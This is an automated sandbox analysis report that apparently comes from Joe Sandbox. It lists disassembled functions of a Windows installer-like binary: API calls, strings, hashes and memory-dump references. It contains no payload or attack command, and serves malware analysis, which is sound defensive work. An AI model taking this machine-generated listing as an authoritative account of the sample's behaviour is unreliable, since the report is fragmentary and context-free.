                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                                                              • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                            Strings
                                                                                                                            • RegCreateKeyEx, xrefs: 004545C3
                                                                                                                            • , xrefs: 004545B1
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                            • API String ID: 2481121983-1280779767
                                                                                                                            • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                                            • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                                                            • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                                            • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00496C50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                                              • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                                                            • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                                                            • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                                                              • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                                            • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                            • API String ID: 1549857992-2312673372
                                                                                                                            • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                                            • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                                                            • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                                            • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042E418 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                                                            • API String ID: 4190037839-2312295185
                                                                                                                            • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                                            • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                                                            • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                                            • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004629F0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetActiveWindow.USER32 ref: 004629FC
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                            • API String ID: 2610873146-3407710046
                                                                                                                            • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                                            • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                                                            • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                                            • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042F188 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetActiveWindow.USER32 ref: 0042F194
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                                            • API String ID: 2610873146-3407710046
                                                                                                                            • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                                            • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                                                            • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                                            • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00458C1C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021B3858,00000000), ref: 00458C79
                                                                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021B3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021B3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021B3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021B3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                                                            • API String ID: 2182916169-3012584893
                                                                                                                            • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                                            • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                                                            • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                                            • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00456D20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                                            • API String ID: 1914119943-2711329623
                                                                                                                            • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                                            • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                                                            • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                                            • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416D80 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                                                            • SaveDC.GDI32(?), ref: 00416E27
                                                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                                                            • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                                                            • DeleteObject.GDI32(?), ref: 00416F22
                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                                                            • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 375863564-0
                                                                                                                            • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                                            • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                                                            • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                                            • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1694776339-0
                                                                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004221E8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3985193851-0
                                                                                                                            • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                                            • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                                                            • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                                            • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00481854 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                                                            • SendNotifyMessageA.USER32(0004043A,00000496,00002710,00000000), ref: 00481A97
                                                                                                                            Strings
                                                                                                                            • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                                                            • DeinitializeSetup, xrefs: 0048190D
                                                                                                                            • Deinitializing Setup., xrefs: 00481872
                                                                                                                            • Restarting Windows., xrefs: 00481A72
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
